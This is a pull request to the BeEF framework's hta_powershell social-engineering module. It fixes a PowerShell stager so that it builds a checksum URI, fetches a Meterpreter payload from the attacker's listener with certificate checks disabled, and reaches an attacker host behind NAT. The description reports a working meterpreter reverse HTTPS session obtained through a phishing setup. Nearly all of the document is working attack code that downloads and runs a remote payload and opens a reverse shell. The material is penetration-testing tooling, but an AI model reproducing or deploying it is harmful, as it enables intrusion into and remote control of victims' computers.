### PR TITLE
Fixed hta_powershell module so that it can establish a meterpreter session.

### DIFF
--- a/extensions/social_engineering/powershell/powershell_payload
+++ b/extensions/social_engineering/powershell/powershell_payload
@@ -404,9 +404,7 @@ function Invoke-ps
             }
         }
         
-        # Meterpreter expects 'INITM' in the URI in order to initiate stage 0. Awesome authentication, huh?
-        # # $Request = "http$($SSL)://$($Lhost):$($Lport)/INITM"
-        # # Write-Verbose "Requesting meterpreter payload from $Request"
+        # Meterpreter to initiate stage 0.
 	$chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
 	$x = ""
 		function sum($v){

--- a/extensions/social_engineering/powershell/powershell_payload
+++ b/extensions/social_engineering/powershell/powershell_payload
@@ -400,13 +400,41 @@ function Invoke-ps
             {
                 $SSL = 's'
                 # Accept invalid certificates
-                [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
+                [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
             }
         }
         
         # Meterpreter expects 'INITM' in the URI in order to initiate stage 0. Awesome authentication, huh?
-        $Request = "http$($SSL)://$($Lhost):$($Lport)/INITM"
-        Write-Verbose "Requesting meterpreter payload from $Request"
+        # # $Request = "http$($SSL)://$($Lhost):$($Lport)/INITM"
+        # # Write-Verbose "Requesting meterpreter payload from $Request"
+	$chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()
+	$x = ""
+		function sum($v){
+		  return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum % 0x100 -eq 92)
+		}
+		
+		function RandomChars{
+		  $f = "";1..3 | foreach-object {$f+= $chars[(Get-Random -maximum $chars.Length)]};
+		  return $f;
+		}
+		
+		function RandomArray { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}
+		
+		function Generate{
+		for ($i=0; $i -lt 64; $i++){
+		    $h = RandomChars;$k = $d | RandomArray; 
+			foreach ($l in $k){
+			    $s = $h + $l; if (sum($s)){ 
+				return $s}
+			     }
+				return "9vXU";
+	              }	 
+		}
+
+	
+	    $GeneratedURI = Generate; 
+        $Request = "http$($SSL)://$($Lhost):$($Lport)/$GeneratedURI"
+	    Write-Verbose "Requesting meterpreter payload from $Request"
         
         $Uri = New-Object Uri($Request)
         $WebClient = New-Object System.Net.WebClient

--- a/modules/social_engineering/hta_powershell/command.js
+++ b/modules/social_engineering/hta_powershell/command.js
@@ -6,7 +6,7 @@
 
 beef.execute(function () {
 
-    var hta_url = '<%= @ps_url %>' + '/hta';
+    var hta_url = '<%= @domain %>' + '<%= @ps_url %>' + '/hta';
 
     if (beef.browser.isIE()) {
         // application='yes' is IE-only and needed to load the HTA into an IFrame.


### PR DESCRIPTION
I was trying to get the hta_powershell attack working with phishing-frenzy and kept running into an error when the target would attempt to get the initial stager.

`<...snip...> Unknown request to /INITM #"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)", "Host"=>"XXX.XXX.XXX.XXX:443", "Connection"=>"Keep-Alive"}, @auto_cl=true, @state=3, @transfer_chunked=false, @inside_chunk=false, @bufq="", @body="", @method="GET", @raw_uri="/INITM", @uri_parts={"QueryString"=>{}, "Resource"=>"/INITM"}, @proto="1.1", @chunk_min_size=1, @chunk_max_size=10, @uri_encode_mode="hex-normal", <...snip...> `

As noted in mattifestation/PowerSploit#65, /INITM is not a supported URI, as meterpreter now uses a checksum URI that matches the :init_native checksum value.

Merging the changes in  mattifestation/PowerSploit#66 allowed me to successfully establish a meterpreter/reverse_https session.

Also made a change as reccommended in beefproject/beef#1072 to allow this attack to succeed from a host behind NAT (such as an AWS instance). Requires that `ReverseListenerBindAddress` option is configured in the exploit handler (pointed to the private ip in this case)